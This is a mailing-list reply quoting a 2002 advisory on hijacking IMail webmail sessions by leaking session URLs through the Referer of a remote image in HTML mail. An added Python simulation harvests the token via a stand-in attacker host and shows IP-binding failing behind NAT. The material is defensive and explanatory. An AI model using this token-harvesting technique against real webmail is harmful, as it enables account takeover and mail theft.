Hi all,

I think this was already covered for IMail 7.04 in the following advisory:

http://cert.uni-stuttgart.de/archive/bugtraq/2001/10/msg00082.html

The workaround given by Ipswitch was: turn off the "ignore source address in security check" option.

This isn't a bulletproof workaround (think of proxies, NAT etc.) but can help to prevent abuse of this issue.

zillion

On Sun, 10 Mar 2002, Obscure wrote:

> Advisory Title: IMail Account hijack through the Web Interface
> Release Date: 10/03/2002
> Application: IMail Server
>
> Platform: Windows NT4
>           Windows 2000
>           Windows XP
>
> Version: 7.05 or earlier
>
> Severity: Malicious users can easily access other people's accounts.
>
> Author: Obscure^ [ obscure@eyeonsecurity.net ]
>
> Vendor Status: Informed on 21 Feb 2002, a fix was already issued to customers.
>
>
> Web:
>
> http://www.eyeonsecurity.net
> http://www.ipswitch.com
>
>
> Background.
>
> (extracted from http://www.ipswitch.com/Products/IMail_Server/index.html)
>
> The 20-Minute E-Mail Solution.
> IMail Server is an easy-to-use, web-enabled, secure and spam-resistant
> mail server for Windows NT/2000/XP. It is the choice of businesses,
> schools, and service providers.
>
> A Great Price-Performer.
> Unlike Microsoft® Exchange and Lotus® Notes, which are costly to
> deploy and cumbersome to administer, IMail Server is easy to install
> and easy to manage. It has a simple pricing structure and is scalable
> to thousands of users per server.
>
>
> Problem.
>
> When a user logs in to his account through the Web interface, the
> session authentication is maintained via a unique URL.
> By sending an HTML e-mail which includes an image at another server,
> an attacker can easily get the unique URL via the Referer field in
> the HTTP header.
>
>
> Exploit Example.
>
> http://eyeonsecurity.net/tools/referer.html
> A CGI script sends an e-mail with an attached image, pointing to
> another CGI script which sends the Referer URL to the attacker.
>
>
> Fix
>
> Upgrade to IMail 7.06. The fixed version checks for the IP. The
> authentication now relies on the unique URL and the IP address.
> Of course users who log in to the IMail Web interface from behind
> proxies are still vulnerable.
>
>
> ps. this same vulnerability affects Excite WebMail. The Excite guys
> did not contact me back.
>
>
> Disclaimer.
>
> The information within this document may change without notice. Use of
> this information constitutes acceptance for use in an AS IS condition.
> There are NO warranties with regard to this information. In no event
> shall the author be liable for any consequences whatsoever arising out
> of or in connection with the use or spread of this information. Any use
> of this information lays within the user's responsibility.
>
>
> Feedback.
>
> Please send suggestions, updates, and comments to:
>
> Eye on Security
> mail : obscure@eyeonsecurity.net
> web  : http://www.eyeonsecurity.net
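The mechanism the advisory describes, as an added example written for this page (it is not Obscure's referer.html tool and not IMail's code): a webmail session whose only credential is a token in the page URL, an HTML mail carrying a remote image, the browser sending that page URL as the Referer when it fetches the image, and the attacker reading the token back out of the Referer. The second half models the two server-side checking modes the thread discusses, token only versus token plus source address (the 7.06 fix / the "source address in security check" option), and shows why the IP check fails once victim and attacker share a proxy or NAT address. Hostnames, the `session` query parameter, the token format and the IP addresses are all assumptions made for the simulation.

```python
"""Simulation of a session-in-URL token leaking via the HTTP Referer.

Everything here is constructed for illustration: the hostnames, the
'session' query parameter, the CGI path and the IP addresses are
assumptions, not IMail's real layout.
"""

import secrets
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs


class RemoteImageFinder(HTMLParser):
    """Collects src attributes of <img> tags that point at absolute http(s) URLs."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        for name, value in attrs:
            if name.lower() == "src" and value and value.lower().startswith(("http://", "https://")):
                self.sources.append(value)


def render_mail_in_webmail(page_url, html_body):
    """Simulate the browser rendering an HTML mail inside the webmail page.

    For every remote image it issues a GET whose Referer header is the URL
    of the page the image is embedded in, i.e. the session URL.  Returns
    the (image_url, request_headers) pairs the attacker's server observes.
    """
    finder = RemoteImageFinder()
    finder.feed(html_body)
    return [(src, {"Referer": page_url}) for src in finder.sources]


def harvest_token_from_referer(headers, token_param="session"):
    """Attacker side: pull the session token out of the Referer's query string."""
    referer = headers.get("Referer", "")
    values = parse_qs(urlparse(referer).query).get(token_param)
    return values[0] if values else None


class WebmailSessions:
    """Minimal server-side session store with two checking modes:
    token only (pre-7.06) or token plus bound source IP (the 7.06 behaviour)."""

    def __init__(self, check_ip):
        self.check_ip = check_ip
        self.sessions = {}  # token -> (user, ip the session was created from)

    def login(self, user, client_ip):
        token = secrets.token_hex(8)  # assumed token format
        self.sessions[token] = (user, client_ip)
        return f"http://webmail.example.test/mail.cgi?session={token}"

    def who_is(self, token, client_ip):
        """Return the user a request with this token/IP is treated as, or None."""
        entry = self.sessions.get(token)
        if entry is None:
            return None
        user, bound_ip = entry
        if self.check_ip and client_ip != bound_ip:
            return None
        return user


def run_attack(check_ip, victim_ip, attacker_ip):
    """Victim logs in from victim_ip and opens the attacker's mail; the
    attacker then replays the harvested token from attacker_ip."""
    server = WebmailSessions(check_ip=check_ip)
    session_url = server.login("victim", victim_ip)
    # Constructed attacker mail: a 1x1 image hosted on the attacker's server.
    html_mail = ('<html><body>Hi!<img src="http://attacker.example.test/cgi-bin/collect.cgi"'
                 ' width="1" height="1"></body></html>')
    stolen = None
    for _src, headers in render_mail_in_webmail(session_url, html_mail):
        stolen = harvest_token_from_referer(headers)
    return server.who_is(stolen, attacker_ip)


if __name__ == "__main__":
    # Token only: attacker anywhere becomes the victim.
    print(run_attack(False, "203.0.113.10", "198.51.100.7"))
    # Token + IP: attacker on a different address is rejected.
    print(run_attack(True, "203.0.113.10", "198.51.100.7"))
    # Token + IP, but both behind the same proxy/NAT address: check is defeated.
    print(run_attack(True, "203.0.113.10", "203.0.113.10"))
```

The third call is the case both zillion and the advisory warn about: once the victim and the attacker present the same source address to the server, binding the token to an IP buys nothing, so the source-address check is a mitigation rather than a fix.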